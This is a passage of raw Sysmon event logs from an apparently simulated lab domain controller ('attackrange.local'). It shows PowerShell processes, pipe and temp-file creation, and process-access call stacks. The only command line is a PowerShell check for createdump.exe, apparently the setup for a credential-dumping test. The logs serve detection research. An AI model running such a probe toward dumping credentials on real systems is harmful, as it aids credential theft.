21:10:06.608{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:06.561{4DB9351A-A32E-60D3-4A06-00000000CF01}3244\PSHost.132689562064851446.3244.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.561{4DB9351A-A32E-60D3-4A06-00000000CF01}3244ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nuehw2pn.ufo.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.561{4DB9351A-A32E-60D3-4A06-00000000CF01}3244ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yspqf13f.kd0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.530{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yspqf13f.kd0.ps12021-06-23 21:10:06.530 10341000x800000000000000025324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.514{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.483{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.485{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe') {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.467{4DB9351A-A32E-60D3-4906-00000000CF01}5716ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.358{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.358{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.317{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.317{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:06.264{4DB9351A-A32E-60D3-4906-00000000CF01}5716\PSHost.132689562062004492.5716.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.248{4DB9351A-A32E-60D3-4906-00000000CF01}5716ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_51r1ubgw.1vr.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.248{4DB9351A-A32E-60D3-4906-00000000CF01}5716ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_432ujdnu.oam.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.248{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_432ujdnu.oam.ps12021-06-23 21:10:06.233 10341000x800000000000000025305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=980F2559D6AAB46367D93EF36E247997,SHA256=0584314DD1C974F9BDED3247E78F275F84EDE67F945BCDA753EDDD2E8487071A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.202{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.202{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32E-60D3-4906-00000000CF01}5716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.202{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.202{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 